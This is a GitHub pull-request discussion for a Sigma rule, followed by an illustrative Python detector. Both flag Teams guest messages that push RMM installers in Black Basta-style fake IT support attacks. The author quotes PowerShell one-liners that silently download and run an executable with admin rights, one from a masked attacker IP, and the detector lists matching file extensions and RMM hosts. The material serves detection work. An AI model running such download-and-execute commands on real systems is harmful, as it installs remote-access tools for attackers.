Create microsoft365_teams_guest_rmm_deployment.yml #5066
base: master
Conversation
This Sigma rule is designed to detect potential malicious guest accounts using onmicrosoft.com domains and the deployment of Remote Monitoring and Management (RMM) tools via Teams messages. The rule identifies emails containing links to executable files or known RMM tool URLs. This detection is crucial for preventing attackers from gaining unauthorized access through email bombing and subsequent fake IT support messages that lead to ransomware deployment.
reference:
https://www.bleepingcomputer.com/news/security/black-basta-ransomware-poses-as-it-support-on-microsoft-teams-to-breach-networks/?form=MG0AV3
https://securityaffairs.com/170311/cyber-crime/black-basta-ransomware-microsoft-teams.html?form=MG0AV3
Thanks for the contribution @prashanthpulisetti. Before I can review this, please make sure that your rule conforms to the rules here in the repo and the standard.
Thanks
Hi @nasbench, thanks for the suggestions, I will make sure to adjust them.
Removed fields, adjusted logsources
They were not suggestions but requirements 😛 haha
adjusted level and falsepositives
updated author name
@prashanthpulisetti can you please provide the full log and not a stripped down version?
rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml
```yaml
- .exe
- .msi
- .js
```
What's the reasoning behind selecting these extensions and not something else?
Hi @nasbench; recently I was working with a client and they had a massive email bombing attack, followed by a Teams guest message, and then they sent a payload which contains a fake RMM tool. So there are two messages the attacker sent via Teams: one is directly https://anydesk.com, which is something similar to

```powershell
Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://download.anydesk.com/AnyDesk.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs
```

and there is another message with an IP as their URL (could be a C2C):

```powershell
Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://xxx.xx.xx.xx/RMM.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs
```

So this is the reason why I've kept to .exe, .msi or .js.
rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml
```yaml
title: Detection of Potential Malicious Guest Accounts and RMM Tool Deployment via Teams
id: aed9c24f-097a-4505-af85-74b4b83982b0
status: experimental
description: Detects potential malicious guest accounts using onmicrosoft.com and deployment of RMM tools via Teams messages.
```
This doesn't really make a lot of sense, can you please rephrase it? What's the relation between guest accounts and deployment of RMMs?
As I mentioned in the notes below, attackers are using Teams channels to send Remote Monitoring and Management (RMM) software, posing as fake Microsoft support agents and asking end users to download these RMM tools under the guise of troubleshooting assistance.
….yml Co-authored-by: Nasreddine Bencherchali <[email protected]>
….yml Co-authored-by: Nasreddine Bencherchali <[email protected]>
added contains for message URLs
please see the original log:
Summary of the Pull Request
Changelog
Created a Sigma rule to detect malicious guest accounts and RMM tool deployment via Teams.
Integrated detection for email patterns indicative of executable files and known RMM tool URLs.
Added references to recent incidents involving Black Basta ransomware using Microsoft Teams.
Example Log Event

```json
{
  "user.email": "[email protected]",
  "o365.audit.MessageURLs": "https://downloads.level.io/install_windows.exe"
}
```
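As an added example, not the rule's YAML and not SigmaHQ code, the Python below reproduces the selection logic the thread describes: a sender on an onmicrosoft.com domain paired with a message URL that either ends in .exe/.msi/.js or points at a known RMM vendor host. The field names `user.email` and `o365.audit.MessageURLs` are taken from the example log event above; the RMM host list (anydesk.com and level.io, the two hosts that appear in this thread), the handling of `MessageURLs` as either a string or a list, and all sample events and addresses are assumptions constructed for the example.

```python
"""Added example: the guest + RMM-link selection discussed in this PR,
applied to constructed M365 audit events. Not the rule's YAML, not SigmaHQ code."""
from urllib.parse import urlparse

# Indicators taken from the thread (.exe/.msi/.js; anydesk.com, level.io).
# Both tuples are starting points, not a complete RMM inventory.
EXECUTABLE_SUFFIXES = (".exe", ".msi", ".js")
RMM_HOSTS = ("anydesk.com", "level.io")

# Constructed sample events in the shape of the PR's example log event.
# Senders, hosts and 203.0.113.10 (an RFC 5737 documentation address) are made up.
SAMPLE_EVENTS = [
    {"user.email": "helpdesk@contoso-it.onmicrosoft.com",
     "o365.audit.MessageURLs": "https://downloads.level.io/install_windows.exe"},
    {"user.email": "helpdesk@contoso-it.onmicrosoft.com",
     "o365.audit.MessageURLs": "https://anydesk.com"},
    {"user.email": "helpdesk@contoso-it.onmicrosoft.com",
     "o365.audit.MessageURLs": "https://docs.example.com/guide.pdf"},
    {"user.email": "alice@example.com",
     "o365.audit.MessageURLs": "https://files.example.com/setup.exe"},
    {"user.email": "support@fabrikam-help.onmicrosoft.com",
     "o365.audit.MessageURLs": ["https://203.0.113.10/RMM.EXE?dl=1"]},
]


def sender_is_onmicrosoft_guest(event):
    """Sender domain is an *.onmicrosoft.com tenant domain (the PR's guest heuristic)."""
    sender = (event.get("user.email") or "").lower()
    domain = sender.rsplit("@", 1)[-1] if "@" in sender else ""
    return domain == "onmicrosoft.com" or domain.endswith(".onmicrosoft.com")


def url_is_suspicious(url):
    """True for links to .exe/.msi/.js files or to a known RMM vendor host."""
    parsed = urlparse(url.strip())
    host = (parsed.hostname or "").lower()
    # Match on the path only, so "setup.exe?dl=1" still hits and "host/exe" does not.
    if parsed.path.lower().endswith(EXECUTABLE_SUFFIXES):
        return True
    return any(host == h or host.endswith("." + h) for h in RMM_HOSTS)


def message_urls(event):
    """Assumption: MessageURLs may be a single string or a list of strings."""
    raw = event.get("o365.audit.MessageURLs") or []
    return [raw] if isinstance(raw, str) else [u for u in raw if u]


def detect(events):
    """Return (sender, url) pairs that satisfy both selections of the rule."""
    hits = []
    for ev in events:
        if not sender_is_onmicrosoft_guest(ev):
            continue
        for url in message_urls(ev):
            if url_is_suspicious(url):
                hits.append((ev["user.email"], url))
    return hits


if __name__ == "__main__":
    for sender, url in detect(SAMPLE_EVENTS):
        print(f"ALERT sender={sender} url={url}")
```

Running it flags three of the five constructed events: the level.io installer, the bare anydesk.com link, and the IP-hosted RMM.EXE with a query string; the PDF link and the .exe sent from a non-onmicrosoft.com sender do not match. Note that the sender check only keys on the domain, so a legitimate partner tenant that still uses its default onmicrosoft.com domain and shares an AnyDesk link will also trigger; that is the false-positive class a deployment of this rule needs to tune for.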